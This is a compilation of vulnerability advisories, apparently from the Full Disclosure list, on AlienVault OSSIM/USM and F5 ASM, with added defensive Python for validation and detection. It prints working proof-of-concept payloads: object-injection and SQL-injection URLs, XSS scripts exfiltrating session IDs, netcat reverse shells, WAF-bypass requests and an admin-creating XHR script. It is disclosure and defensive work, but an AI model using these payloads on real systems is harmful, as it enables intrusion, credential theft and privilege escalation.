[FD] CVE-2016-8580 - Alienvault OSSIM/USM Object Injection Vulnerability
Details
=======
Product: Alienvault OSSIM/USM
Vulnerability: PHP Object Injection
Author: Peter Lapp, lappsec () gmail com
CVE: CVE-2016-8580
Vulnerable Versions: <=5.3.1
Fixed Version: 5.3.2

Vulnerability Details
=====================
A PHP object injection vulnerability exists in multiple widget files due to the unsafe use of the unserialize() function. The affected files include flow_chart.php, gauge.php, honeypot.php, image.php, inventory.php, otx.php, rss.php, security.php, siem.php, taxonomy.php, tickets.php, and url.php. An authenticated attacker could send a serialized PHP object to one of the vulnerable pages and potentially gain code execution via magic methods in included classes.

POC
===
This benign POC injects the IDS_Report class from PHPIDS into the refresh parameter of image.php. The __toString method of IDS_Report is then executed and the output is displayed in the value of the content field in the response:

/ossim/dashboard/sections/widgets/data/image.php?type=test=blah=1=1=1==1=a%3A5%3A{s%3A3%3A%22top%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22adjustment%22%3Bs%3A8%3A%22original%22%3Bs%3A6%3A%22height%22%3Bs%3A3%3A%22123%22%3Bs%3A7%3A%22refresh%22%3BO%3A10%3A%22IDS_Report%22%3A3%3A{s%3A9%3A%22%00*%00events%22%3Bs%3A9%3A%22testevent%22%3Bs%3A7%3A%22%00*%00tags%22%3Bs%3A1%3A%221%22%3Bs%3A9%3A%22%00*%00impact%22%3Bs%3A16%3A%22Object+Injection%22%3B}s%3A7%3A%22content%22%3Bs%3A36%3A%22aHR0cDovL3d3dy50ZXN0LmNvbS8xLnBuZw%3D%3D%22%3B}

Timeline
========
08/03/16 - Reported to Vendor
10/03/16 - Fixed in version 5.3.2

References
==========
https://www.alienvault.com/forums/discussion/7766/security-advisory-alienvault-5-3-2-address-70-vulnerabilities

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] CVE-2016-8581 - Alienvault OSSIM/USM Stored XSS Vulnerability
Details
=======
Product: Alienvault OSSIM/USM
Vulnerability: Stored XSS
Author: Peter Lapp, lappsec () gmail com
CVE: CVE-2016-8581
CVSS: 3.5
Vulnerable Versions: <=5.3.1
Fixed Version: 5.3.2

Vulnerability Details
=====================
A stored XSS vulnerability exists in the User-Agent header of the login process. It's possible to inject a script into that header that then gets executed when mousing over the User-Agent field in Settings -> Current Sessions.

POC
===
The POC uses jQuery to send all session IDs on the "Current Sessions" page to an arbitrary site (Google, in this case):

$('#ops_table .ops_id').each(function(){$.get("https://www.google.com/",{session:($(this).html())});});

Timeline
========
08/03/16 - Reported to Vendor
10/03/16 - Fixed in version 5.3.2

References
==========
https://www.alienvault.com/forums/discussion/7766/security-advisory-alienvault-5-3-2-address-70-vulnerabilities
[FD] CVE-2016-8582 - Alienvault OSSIM/USM SQL Injection Vulnerability
Details
=======
Product: Alienvault OSSIM/USM
Vulnerability: SQL Injection
Author: Peter Lapp, lappsec () gmail com
CVE: CVE-2016-8582
Vulnerable Versions: <=5.3.1
Fixed Version: 5.3.2

Vulnerability Details
=====================
A SQL injection vulnerability exists in the value parameter of /ossim/dashboard/sections/widgets/data/gauge.php on line 231. By sending a serialized array with a SQL query in the type field, it's possible to execute an arbitrary SQL query. The result is not displayed on the screen, but it can be exploited as a blind SQLi or have the output directed to a file and then retrieved via another request. Authentication is required.

POC
===
This request will dump user password hashes to a file:

/ossim/dashboard/sections/widgets/data/gauge.php?=alarm=blah=1=1=a%3A1%3A%7Bs%3A4%3A%22type%22%3Bs%3A67%3A%22pass+from+users+INTO+OUTFILE+%27%2Ftmp%2F10.0.0.123_pass_tshark.pcap%27--+-%22%3B%7D

The file containing the output can then be retrieved with the following request:

/ossim/pcap/download.php?scan_name=pass_ip=10.0.0.123

It's also possible to read the contents of any file readable by the mysql user by using mysql's load_file function. For example, changing the request to something like select load_file('/etc/passwd').

Timeline
========
08/03/16 - Reported to Vendor
10/03/16 - Fixed in version 5.3.2

References
==========
https://www.alienvault.com/forums/discussion/7766/security-advisory-alienvault-5-3-2-address-70-vulnerabilities
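The object injection in CVE-2016-8580 and the SQL injection in CVE-2016-8582 share one root cause: widget parameters go through unserialize() before any validation. Below is an added example that serves both advisories (my code, not the advisories' POCs and not AlienVault or PHPIDS code): a small emulation of PHP's serialize() that rebuilds the two POC payloads from structured data, so the byte-length prefixes and the NUL-delimited protected-property names come out right, and a request-side check that decodes a parameter value once and flags any serialized object or SQL fragment inside it. PhpObject, php_serialize, inspect_query_value and the other names are mine; the payload values and POC_QUERY_VALUE are copied from the advisories.

```python
import re
from dataclasses import dataclass
from urllib.parse import quote_plus, unquote_plus

# Added example with hypothetical helper names; not OSSIM or PHPIDS code.


@dataclass
class PhpObject:
    """A PHP object, serialized as O:<len>:"<class>":<n>:{<props>}."""
    cls: str
    props: dict


def protected(name: str) -> str:
    """PHP stores a protected property name as NUL, '*', NUL, then the name."""
    return "\0*\0" + name


def php_serialize(value) -> str:
    """Mimic PHP serialize() for str/int/bool/dict/PhpObject.
    String lengths are byte counts, so the NUL markers above are counted."""
    if isinstance(value, bool):
        return "b:%d;" % value
    if isinstance(value, int):
        return "i:%d;" % value
    if isinstance(value, str):
        return 's:%d:"%s";' % (len(value.encode("utf-8")), value)
    if isinstance(value, dict):
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in value.items())
        return "a:%d:{%s}" % (len(value), body)
    if isinstance(value, PhpObject):
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in value.props.items())
        return 'O:%d:"%s":%d:{%s}' % (len(value.cls), value.cls, len(value.props), body)
    raise TypeError("unsupported type: %r" % type(value))


def object_injection_payload() -> str:
    """CVE-2016-8580 POC: an IDS_Report object in the refresh key of the widget array."""
    report = PhpObject("IDS_Report", {
        protected("events"): "testevent",
        protected("tags"): "1",
        protected("impact"): "Object Injection",
    })
    return php_serialize({
        "top": "1",
        "adjustment": "original",
        "height": "123",
        "refresh": report,
        "content": "aHR0cDovL3d3dy50ZXN0LmNvbS8xLnBuZw==",  # base64 of the image URL
    })


def sqli_payload(outfile: str) -> str:
    """CVE-2016-8582 POC: SQL appended to the type key; outfile is the INTO OUTFILE path."""
    return php_serialize({"type": "pass from users INTO OUTFILE '%s'-- -" % outfile})


def url_encode(payload: str) -> str:
    """Query-string form of a payload: NUL bytes become %00, spaces become +."""
    return quote_plus(payload)


def decode_query_value(raw: str) -> str:
    """Single URL-decode of one parameter value (what the PHP side sees)."""
    return unquote_plus(raw)


# Detection side: decode once, then look for a serialized object of any class
# and for SQL fragments that have no business inside a widget setting.
SERIALIZED_OBJECT = re.compile(r'O:\d+:"([A-Za-z0-9_\\]+)":\d+:\{')
SQL_FRAGMENT = re.compile(r"\b(INTO\s+OUTFILE|UNION\s+SELECT|LOAD_FILE\s*\(|SLEEP\s*\()", re.I)


def inspect_query_value(raw: str) -> dict:
    """Class names and SQL fragments found in one URL-encoded parameter value."""
    decoded = decode_query_value(raw)
    return {
        "classes": SERIALIZED_OBJECT.findall(decoded),
        "sql": [m.group(1) for m in SQL_FRAGMENT.finditer(decoded)],
    }


# The encoded value from the CVE-2016-8580 POC, copied from the advisory.
POC_QUERY_VALUE = (
    "a%3A5%3A{s%3A3%3A%22top%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22adjustment%22%3Bs%3A8%3A%22original%22%3B"
    "s%3A6%3A%22height%22%3Bs%3A3%3A%22123%22%3Bs%3A7%3A%22refresh%22%3BO%3A10%3A%22IDS_Report%22%3A3%3A{"
    "s%3A9%3A%22%00*%00events%22%3Bs%3A9%3A%22testevent%22%3Bs%3A7%3A%22%00*%00tags%22%3Bs%3A1%3A%221%22%3B"
    "s%3A9%3A%22%00*%00impact%22%3Bs%3A16%3A%22Object+Injection%22%3B}s%3A7%3A%22content%22%3B"
    "s%3A36%3A%22aHR0cDovL3d3dy50ZXN0LmNvbS8xLnBuZw%3D%3D%22%3B}"
)
```

On the application side the matching fix is to stop accepting serialized PHP from the client at all (pass widget settings as JSON and json_decode() them) or, where unserialize() cannot be removed, to call it with ['allowed_classes' => false] so no object is ever instantiated from request data; the SQL in the type key still needs a parameterised query regardless.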
[FD] CVE-2016-8583 - Alienvault OSSIM/USM Reflected XSS
Details
=======
Product: Alienvault OSSIM/USM
Vulnerability: Reflected XSS
Author: Peter Lapp, lappsec () gmail com
CVE: CVE-2016-8583
Vulnerable Versions: <=5.3.1
Fixed Version: 5.3.2

Vulnerability Details
=====================
Multiple GET parameters in the vulnerability scan scheduler of OSSIM/USM before 5.3.2 are vulnerable to reflected XSS. The parameters include jobname, timeout, sched_id, and targets[] in /ossim/vulnmeter/sched.php.

POC
===
Example payload is:

"><body+onpageshow%3d"alert(0)

For the targets[] param the payload is slightly different.

Timeline
========
08/03/16 - Reported to Vendor
10/03/16 - Fixed in version 5.3.2

References
==========
https://www.alienvault.com/forums/discussion/7766/security-advisory-alienvault-5-3-2-address-70-vulnerabilities
Re: [FD] Alienvault OSSIM/USM Multiple Vulnerabilities
Shortly after I posted this I received an email from Alienvault stating that a fix is imminent and is planned to be released next week in version 5.0.2. Thanks to AV for getting back to me on this.

On Tue, May 5, 2015 at 9:21 PM, Peter Lapp lapp...@gmail.com wrote:
> [quoted original advisory omitted; it appears in full as the next message]
[FD] Alienvault OSSIM/USM Multiple Vulnerabilities
Details
=======
Product: Alienvault OSSIM/USM
Vulnerability: Multiple Vulnerabilities (XSS, SQLi, Command Execution)
Author: Peter Lapp, lapp...@gmail.com
CVE: None assigned
Vulnerable Versions: Tested on 4.14, 4.15, and 5.0. It likely affects all previous versions as well.
Fixed Version: No fix has been released.

Summary
=======
Alienvault OSSIM is an open source SIEM solution designed to collect and correlate log data. The vulnerability management section of the UI allows a user to upload a Nessus scan in NBE format. Using a specially crafted NBE file, a user can exploit multiple vulnerabilities such as XSS, SQLi, and Command Execution. Authentication is required to exploit this vulnerability, but admin privileges are not required. Any user with access to the Vulnerabilities page can perform these attacks.

The vendor was notified almost 5 months ago about this vulnerability. Given that they have not responded to my recent requests for updates and just released a major version that did not patch these issues, I have decided to release the details.

Technical Details
=================
Various fields within the NBE file can be manipulated to exploit certain vulnerabilities. A pretty bare template that I used to test these issues looked something like this:

timestamps|||scan_start|Thu Dec 11 17:00:51 2014|
timestamps||1.1.1.1|host_start|Thu Dec 11 17:00:52 2014|
results|1.1.1.1|1.1.1.1|cifs (445/tcp)|1234|Security Hole|Synopsis :\n\nThe remote host contains a web browser that is affected by multiple vulnerabilities.\nOther references : OSVDB:113197,OSVDB:113198,OSVDB:113199,OSVDB:115035\n
timestamps||1.1.1.1|host_end|Thu Dec 11 17:11:58 2014|
timestamps|||scan_end|Thu Dec 11 17:16:44 2014|

Reflective XSS
--------------
The hostname/IP portion of the NBE import is vulnerable. Putting <script>alert(0)</script> directly after the hostname/IP in the NBE will result in the javascript being reflected back when the import finishes.

Stored XSS
----------
The plugin ID portion of the NBE is vulnerable. Adding <script>alert(document.cookie)</script> to the plugin ID in the NBE will result in the script being executed every time someone views the HTML report in the OSSIM interface.

Blind SQL Injection
-------------------
The plugin ID is also vulnerable to blind SQLi. Adding ' UNION SELECT SLEEP(20) AND '1'='1 to the plugin ID will cause the DB to sleep for 20 seconds.

SQL Injection
-------------
The protocol portion of the NBE is vulnerable to SQL injection. Take this:

cifs (445/tcp)

And turn it to this:

cifs','0','1(',(select/**/pass/**/from/**/users/**/where/**/login=admin),'N');# (445/tcp)

That will result in the hash of the admin password being included in the report. The extra '(' in '1(' is required for the ending ) in order to not cause an error in the Perl script that runs the import.

Command Injection
-----------------
The hostname/IP portion of the NBE is vulnerable. Adding '#nc -c /bin/sh 10.10.10.10 ' will result in a reverse shell as www-data to 10.10.10.10. The initial # is required to comment out the remainder of a SQL query that comes before the dig command where this is injected. Without it the script won't proceed to the required point.

Solution
========
There's no official patch for this yet. It is possible to restrict access to the Vulnerabilities page via user roles, which should prevent a user from exploiting this. Also, if you're not using the import feature, you could rename the Perl script on the file system that runs the import.

Timeline
========
01/12/2015 - Notified the vendor of the vulnerabilities.
01/12/2015 - Vendor confirms the issue and files a defect.
01/28/2015 - Requested an update from the vendor and was told the issue would be worked on in the future.
04/20/2015 - Requested an update and informed the vendor of my intent to release the details. No response.
05/05/2015 - Released details to FD.
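An NBE reader that refuses all five malicious variants above, as an added example (my code, not OSSIM's Perl import script): every field is checked against the narrow shape Nessus actually writes (an IP or hostname, a service name with (port/proto), an integer plugin ID, a known severity) before anything could reach SQL, a shell or the report, and the free-text description is HTML-escaped on the way in. parse_nbe and Finding are my names; CLEAN_NBE is the template from the post, and MALICIOUS_NBE is a constructed file carrying the five payloads from it.

```python
import html
import re
from dataclasses import dataclass

# Added example with hypothetical names; not OSSIM's importer. Whitelist each
# NBE field instead of trusting the file because a logged-in user wrote it.

HOSTNAME = re.compile(
    r"^(?:\d{1,3}(?:\.\d{1,3}){3}"                          # dotted-quad IPv4 ...
    r"|[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"        # ... or a DNS name
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*)$"
)
PORT_FIELD = re.compile(r"^(?:[A-Za-z0-9_.?-]+ \(\d{1,5}/(?:tcp|udp|icmp)\)|general/(?:tcp|udp|icmp))$")
PLUGIN_ID = re.compile(r"^\d{1,7}$")
SEVERITIES = {"Security Hole", "Security Warning", "Security Note", "Log Message"}


@dataclass
class Finding:
    host: str
    port: str
    plugin_id: int
    severity: str
    description: str  # HTML-escaped here, so the report can embed it as-is


def parse_nbe(text: str):
    """Return (findings, errors); errors is a list of (line_no, field, value).
    A line with any bad field is dropped whole rather than partially imported."""
    findings, errors = [], []
    for line_no, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split("|")
        kind = fields[0]
        if kind == "timestamps":
            # timestamps|<subnet>|<host>|<event>|<date>|
            if len(fields) < 5:
                errors.append((line_no, "fields", line))
            elif fields[2] and not HOSTNAME.match(fields[2]):
                errors.append((line_no, "host", fields[2]))
            continue
        if kind != "results":
            errors.append((line_no, "record", kind))
            continue
        if len(fields) < 7:
            errors.append((line_no, "fields", line))
            continue
        # results|<subnet>|<host>|<service (port/proto)>|<plugin id>|<severity>|<description>
        _, _subnet, host, port, plugin, severity = fields[:6]
        description = "|".join(fields[6:])
        bad = []
        if not HOSTNAME.match(host):
            bad.append(("host", host))
        if not PORT_FIELD.match(port):
            bad.append(("port", port))
        if not PLUGIN_ID.match(plugin):
            bad.append(("plugin_id", plugin))
        if severity not in SEVERITIES:
            bad.append(("severity", severity))
        if bad:
            errors.extend((line_no, f, v) for f, v in bad)
            continue
        findings.append(Finding(host, port, int(plugin), severity, html.escape(description)))
    return findings, errors


# The template from the post (literal backslash-n sequences, as Nessus writes them).
CLEAN_NBE = "\n".join([
    r"timestamps|||scan_start|Thu Dec 11 17:00:51 2014|",
    r"timestamps||1.1.1.1|host_start|Thu Dec 11 17:00:52 2014|",
    r"results|1.1.1.1|1.1.1.1|cifs (445/tcp)|1234|Security Hole|Synopsis :\n\nThe remote host contains a web browser that is affected by multiple vulnerabilities.\nOther references : OSVDB:113197,OSVDB:113198,OSVDB:113199,OSVDB:115035\n",
    r"timestamps||1.1.1.1|host_end|Thu Dec 11 17:11:58 2014|",
    r"timestamps|||scan_end|Thu Dec 11 17:16:44 2014|",
])

# Constructed file: one results line per payload in the post (lines 3 to 7).
MALICIOUS_NBE = "\n".join([
    "timestamps|||scan_start|Thu Dec 11 17:00:51 2014|",
    "timestamps||1.1.1.1|host_start|Thu Dec 11 17:00:52 2014|",
    "results|1.1.1.1|1.1.1.1<script>alert(0)</script>|cifs (445/tcp)|1234|Security Hole|reflected XSS via host",
    "results|1.1.1.1|1.1.1.1|cifs (445/tcp)|1234<script>alert(document.cookie)</script>|Security Hole|stored XSS via plugin id",
    "results|1.1.1.1|1.1.1.1|cifs (445/tcp)|1234' UNION SELECT SLEEP(20) AND '1'='1|Security Hole|blind SQLi via plugin id",
    "results|1.1.1.1|1.1.1.1|cifs','0','1(',(select/**/pass/**/from/**/users/**/where/**/login=admin),'N');# (445/tcp)|1234|Security Hole|SQLi via protocol",
    "results|1.1.1.1|1.1.1.1'#nc -c /bin/sh 10.10.10.10|cifs (445/tcp)|1234|Security Hole|command injection via host",
    "timestamps||1.1.1.1|host_end|Thu Dec 11 17:11:58 2014|",
    "timestamps|||scan_end|Thu Dec 11 17:16:44 2014|",
])
```

Validation here is deliberately positive (what a field may look like) rather than a blacklist of quotes and angle brackets; the SQL and shell sinks still need parameterised queries and argv-style execution, but with this in front of them none of the five payloads reaches them in the first place.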
[FD] F5 ASM JSON Profile Bypass
Details
=======
Product: F5 BIG-IP Application Security Manager (ASM)
Vulnerability: Web Application Firewall Bypass
Author: Peter Lapp, lappsec () gmail com
CVE: None assigned
Vulnerable Versions: Confirmed 11.4.0, 11.4.1. Should apply to all releases.
Fixed Version: None

Summary
=======
The F5 ASM is a web application firewall designed to protect web applications from attacks. Due to the way that the system processes JSON content, it's possible to bypass the ASM using a crafted request to a URL that processes both JSON and regular URL encoded requests. The vendor has acknowledged that this is an issue and has indicated that a fix will be released sometime in the future, but doesn't have a time frame and it's not a priority. I decided to release the details so anyone with a vulnerable configuration is aware of the risk and can act accordingly.

Technical Details
=================
The problem is that the ASM's JSON parser does not normalize URL encoded content. So it will block <script>, but not %3cscript%3e. This is fine unless you have a JSON profile applied to a URL that also processes normal x-www-form-urlencoded POST requests. In this case, it's possible to trick the ASM into thinking the request is JSON, URL encode your payload, and slip it through to the application.

Granted, this bypass is limited to a specific configuration, but it's really not that uncommon to have a JSON profile applied to a URL that also processes other data. Possible scenarios include a generic JSON catchall, one automatically created by the policy builder, or you may have a web application that uses parameter based navigation (page=json goes to one page, page=search goes to another). In any case, if you have a JSON profile applied to a URL that also handles POST requests with x-www-form-urlencoded content, you're vulnerable.

First, in order to bypass the ASM, you have to trick it into thinking the request content is JSON. In F5's documentation (https://support.f5.com/kb/en-us/products/big-ip_asm/manuals/product/asm-implementations-11-4-0/14.html), they recommend matching *json* in the Content-Type header. This is easily tricked by setting the header to:

Content-Type: application/x-www-form-urlencoded; charset=UTF-8;json

I then tested setting it to only match on application/json, but that was still tricked by dual content-type headers:

Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Type: application/json

The application (running on Tomcat) processed the request as urlencoded, but the ASM processed it as JSON.

From here, passing through a malicious payload depends on the violations that are enabled on the security profile. If Malformed JSON is NOT enabled, you can just tag json onto the end of the content header (or double the header), URL encode special characters in your payload and send it away. In this case, a request like the following would not be blocked:

POST / HTTP/1.1
Host: x.x.x.x
Connection: keep-alive
Content-Length: 168
Content-Type: application/x-www-form-urlencoded; charset=UTF-8;json

search=%3cimg+src%3dx+onerror%3alert%280%29%3e

If Malformed JSON violations are enabled, then the payload has to be valid JSON. A request like the one below will get past that. It's not pretty but it works. This request will get past the ASM with all the bells and whistles enabled.

POST / HTTP/1.1
Host: x.x.x.x
Connection: keep-alive
Content-Length: 168
Content-Type: application/x-www-form-urlencoded; charset=UTF-8;json

{junkparam=search=%3cimg+src%3dx+onerror%3dalert%280%29%3ejunkparam2=:junk}

The ASM parses that as JSON and it is well formed so there aren't any errors. But the application is processing it as x-www-form-urlencoded so {junkparam is just treated as a regular parameter name and the second parameter with the payload in it gets through. The last parameter is there just to close out the JSON format.

Also, because JSON profiles don't check for meta characters in parameter names, it doesn't trigger an Illegal meta character in parameter name violation. If the payload looked like this:

{param:junkparam=locationFilter=%3cimg+src%3dx+onerror%3dalert%280%29%3ejunkparam2=}

then it would still get through but only if the illegal meta character in value violation was not set to block.

Right now there is no fix for this issue and I haven't been able to find a way to block a request like the one above from getting through. I consulted F5's engineers and they said this was by design and there's no way to block it as of now. There will be a fix for this in the future, but until then make sure that your ASM profiles are as explicit as possible and you have compensating security controls for any URLs that this bypass would apply to. It's just another reason not to use a WAF as a band-aid for a vulnerable application!

Feel free to contact me if you have any questions or additional information to add to this.

Timeline
========
1/19/2015 - Reported the issue to the vendor
2/26/2015
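The two evasions, modelled as an added example (my code, not F5's; the names are mine, and classify_naive only models the *json* substring match described above, not the ASM's real logic): a classifier that keys on a substring of any Content-Type header is set against one that parses the media type proper and refuses duplicate headers, and the same XSS signature is run with and without URL-decoding first. The request headers and bodies are the ones from the two requests above.

```python
import re
from urllib.parse import unquote_plus

# Added example; hypothetical names, not F5 code. classify_naive models the
# "*json* in Content-Type" match from the F5 documentation cited in the post.

FORM = "application/x-www-form-urlencoded"
JSON = "application/json"


def content_type_headers(headers):
    """All Content-Type values, matched case-insensitively, in wire order."""
    return [v for k, v in headers if k.lower() == "content-type"]


def classify_naive(headers) -> str:
    """'json' if any Content-Type header merely contains the substring json."""
    return "json" if any("json" in v.lower() for v in content_type_headers(headers)) else "form"


def media_type(value: str) -> str:
    """The media type proper: the part before the first ';', normalised."""
    return value.partition(";")[0].strip().lower()


def classify_strict(headers) -> str:
    """Refuse ambiguous requests; otherwise decide on the parsed media type only."""
    cts = content_type_headers(headers)
    if len(cts) != 1:
        return "reject"  # zero or duplicate Content-Type headers: do not guess
    mt = media_type(cts[0])
    if mt == JSON:
        return "json"
    if mt == FORM:
        return "form"
    return "other"


XSS_SIGNATURE = re.compile(r"<\s*(?:script|img|svg|iframe|body)\b|\bon[a-z]+\s*=", re.I)


def signature_hit(body: str, normalize: bool) -> bool:
    """The JSON path in the post skips URL-decoding; the form path decodes first."""
    data = unquote_plus(body) if normalize else body
    return XSS_SIGNATURE.search(data) is not None


# Header lists modelling the two requests in the post (bodies copied from it).
SUFFIX_TRICK = [
    ("Host", "x.x.x.x"),
    ("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8;json"),
]
DUPLICATE_HEADER_TRICK = [
    ("Host", "x.x.x.x"),
    ("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8"),
    ("Content-Type", "application/json"),
]
BODY = "search=%3cimg+src%3dx+onerror%3dalert%280%29%3e"


def evaluate(headers, body) -> dict:
    """What the naive and the strict inspection each conclude for one request."""
    profile = classify_naive(headers)
    return {
        "naive_profile": profile,
        "strict_profile": classify_strict(headers),
        # the naive path decodes only under a form profile, so 'json' skips it
        "naive_blocked": signature_hit(body, normalize=(profile == "form")),
        "strict_blocked": signature_hit(body, normalize=True),
    }
```

The two rules this reduces to are worth applying to any content-routing check in front of an application: classify on the parsed media type, not on a substring, and treat a request with more than one Content-Type header as malformed rather than picking one, because the application behind you may pick the other.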
[FD] Alienvault OSSIM/USM Command Execution Vulnerability
Details
=======
Product: Alienvault OSSIM/USM
Vulnerability: Command Execution
Author: Peter Lapp, lapp...@gmail.com
CVE: None assigned
Vulnerable Versions: <=4.14.X
Fixed Version: 4.15.0

Summary
=======
Alienvault OSSIM is an open source SIEM solution designed to collect and correlate log data. The automatic deployment option for OSSEC agents is vulnerable to command execution as root. Authentication to the web UI is required to exploit this vulnerability.

Technical Details and POC
=========================
The web UI allows a user to automatically deploy OSSEC agents to Windows hosts when supplied with a username and password. The username and password are passed unfiltered to a command that runs as root. By simply providing a password of

fakepass | nc -c /bin/sh X.X.X.X 1234 |

a reverse shell is created and root access to the operating system is obtained. The user.log shows the input as it is passed to the command:

Dec 18 16:42:28 ossim-server ansible-command: Invoked with executable=/bin/bash shell=True args= program_files_x86=$(winexe --user=/test%fakepass | nc -c /bin/sh 10.10.10.10 1234 | //10.10.10.199 'cmd /c set' | grep ^ProgramFiles(x86)= | cut -d'=' -f 2-); program_files_x64=$(winexe --user=/test%fakepass | nc -c /bin/sh 10.10.10.10 1234 | //10.10.10.199 'cmd /c set' | grep ^ProgramFiles= | cut -d'=' -f 2-); [[ $program_files_x86 ]] && echo $program_files_x86 || echo $program_files_x64 removes=None creates=None chdir=None

Solution
========
Upgrade to v4.15

References
==========
https://www.alienvault.com/forums/discussion/4414/alienvault-v4-15-functional-release (ENG-98338)

Timeline
========
12/18/14 - Reported the vulnerability to the vendor and received confirmation that a defect was filed.
01/14/15 - Vendor confirmed the issue was fixed and patch available.
01/15/15 - Confirmed vulnerability was no longer exploitable and released info.
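The log line shows the password being spliced into a bash -c string. The added example below (my code, not OSSIM's or Ansible's; the names are mine) builds the same winexe invocation as an argv list that no password can break out of, shows the difference with a shell tokeniser, and includes a user.log check that flags winexe --user operands whose password part carries shell syntax. LOG_LINE is the entry quoted above; PASSWORD_POC is the advisory's payload with the host from that entry.

```python
import re
import shlex

# Added example with hypothetical names; not OSSIM or Ansible code.

PASSWORD_POC = "fakepass | nc -c /bin/sh 10.10.10.10 1234 |"  # payload from the advisory


def vulnerable_command(user: str, password: str, host: str) -> str:
    """String interpolation into a shell command line, as user.log shows it."""
    return "winexe --user=/%s%%%s //%s 'cmd /c set'" % (user, password, host)


def hardened_argv(user: str, password: str, host: str) -> list:
    """Same invocation as argv: with no shell in between, '|' is just a byte."""
    return ["winexe", "--user=/%s%%%s" % (user, password), "//%s" % host, "cmd /c set"]


def hardened_command(user: str, password: str, host: str) -> str:
    """If a shell string is unavoidable, quote every operand with shlex.quote."""
    return " ".join(shlex.quote(a) for a in hardened_argv(user, password, host))


def shell_string_is_intact(user: str, password: str, host: str) -> bool:
    """True if the quoted shell string re-splits to exactly the intended argv."""
    return shlex.split(hardened_command(user, password, host)) == hardened_argv(user, password, host)


def shell_words(command: str) -> list:
    """Tokenise like a POSIX shell, with | ; & ( ) < > as tokens of their own."""
    return list(shlex.shlex(command, posix=True, punctuation_chars=True))


# Detection: pull each --user=<domain>/<user>%<password> operand out of an
# ansible-command entry and flag passwords that contain shell metacharacters.
USER_ARG = re.compile(r"--user=(.*?) //")
SHELL_META = re.compile(r"[|;&`$<>()\n]")


def suspicious_winexe_credentials(log_line: str) -> list:
    """Password parts of winexe --user operands that contain shell syntax."""
    hits = []
    for operand in USER_ARG.findall(log_line):
        _user, _, password = operand.partition("%")
        if SHELL_META.search(password):
            hits.append(password)
    return hits


# The user.log entry quoted in the advisory.
LOG_LINE = (
    "Dec 18 16:42:28 ossim-server ansible-command: Invoked with executable=/bin/bash shell=True args= "
    "program_files_x86=$(winexe --user=/test%fakepass | nc -c /bin/sh 10.10.10.10 1234 | //10.10.10.199 "
    "'cmd /c set' | grep ^ProgramFiles(x86)= | cut -d'=' -f 2-); "
    "program_files_x64=$(winexe --user=/test%fakepass | nc -c /bin/sh 10.10.10.10 1234 | //10.10.10.199 "
    "'cmd /c set' | grep ^ProgramFiles= | cut -d'=' -f 2-); "
    "[[ $program_files_x86 ]] && echo $program_files_x86 || echo $program_files_x64 "
    "removes=None creates=None chdir=None"
)
```

Ansible's command module, unlike shell, passes argv without a shell, so the argv form also removes the dependency on whoever writes the playbook remembering to quote; the log check is the compensating control for the window before the upgrade to 4.15.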
[FD] Stored XSS Vulnerability in F5 BIG-IP Application Security Manager
Details
=======
Product: F5 BIG-IP Application Security Manager (ASM)
Vulnerability: Cross Site Scripting
Author: Peter Lapp, lapp...@gmail.com
CVE: None assigned
Vulnerable Versions: Confirmed 11.4.0, 11.4.1. Likely 11.4.x-11.5.x.
Fixed Version: 11.6

Summary
=======
The F5 ASM is a web application firewall designed to protect web applications from attacks. It allows for a custom HTML page to be displayed to end users when they trigger a violation. The configuration page for the custom response contains a text input for HTML and a Show button that allows the editor to preview the page. This functionality is vulnerable to Cross Site Scripting.

Technical Details and POC
=========================
The HTML entered into the Response Body area is not sandboxed, which allows a malicious user to include JavaScript that would run in the context of the management console whenever a user clicks the Show button. The user could use XHR to bypass CSRF protections and perform commands on behalf of anyone that clicks the Show button.

Scenario:
1. A restricted user (Application Security Editor role) logs into the management console of the ASM, enters Javascript to add a new user (see below) into the Response Body input, and saves the page.
2. An admin logs on and previews the block page via the Show button.
3. The JS runs in the background, executes the XHR, and adds a new admin user. The restricted user now has an admin account.

POC (Sloppy, I know):

<script>
var xmlhttp = new XMLHttpRequest();
xmlhttp.onreadystatechange = function() {
  if (xmlhttp.readyState == 4) {
    var postrequest = new XMLHttpRequest();
    xmlForm = xmlhttp.responseXML.getElementById('myform');
    var timenowvalue = encodeURIComponent(xmlForm.elements['_timenow'].value);
    var timebeforevalue = encodeURIComponent(xmlForm.elements['_timenow_before'].value);
    var bufvalue = encodeURIComponent(xmlForm.elements['_bufvalue'].value);
    var bufvaluebefore = encodeURIComponent(xmlForm.elements['_bufvalue_before'].value);
    var parameters = "_timenow=" + timenowvalue +
      "&_timenow_before=" + timebeforevalue +
      "&_bufvalue=" + bufvalue +
      "&_bufvalue_before=" + bufvaluebefore +
      "&_form_holder_opener_=&handler=%2Ftmui%2Fsystem%2Fuser%2Fcreate&handler_before=%2Ftmui%2Fsystem%2Fuser%2Fcreate" +
      "&showObjList=shell_with_bash&showObjList_before=&hideObjList=partition_row%2Cshell_no_bash&hideObjList_before=" +
      "&enableObjList=&enableObjList_before=&disableObjList=&disableObjList_before=&_bufvalue_validation=NO_VALIDATION" +
      "&com.f5.util.LinkedAdd.action_override=%2Ftmui%2Fsystem%2Fuser%2Fcreate&com.f5.util.LinkedAdd.action_override_before=%2Ftmui%2Fsystem%2Fuser%2Fcreate" +
      "&linked_add_id=&linked_add_id_before=&exit_page=%2Ftmui%2Fsystem%2Fuser%2Flist.jsp&exit_page_before=%2Ftmui%2Fsystem%2Fuser%2Flist.jsp" +
      "&user_role_before=900&user_role_before_before=900" +
      "&form_page=%2Ftmui%2Fsystem%2Fuser%2Fcreate.jsp%3F&form_page_before=%2Ftmui%2Fsystem%2Fuser%2Fcreate.jsp%3F" +
      "&name=testadmin&name_before=&name_validation=NO_VALIDATION&name_required=1" +
      "&passwd=testing123&passwd_before=&passwd_validation=com.f5.form.PasswordValidator&passwd_validationparam1=passwd_confirm&passwd_required=1" +
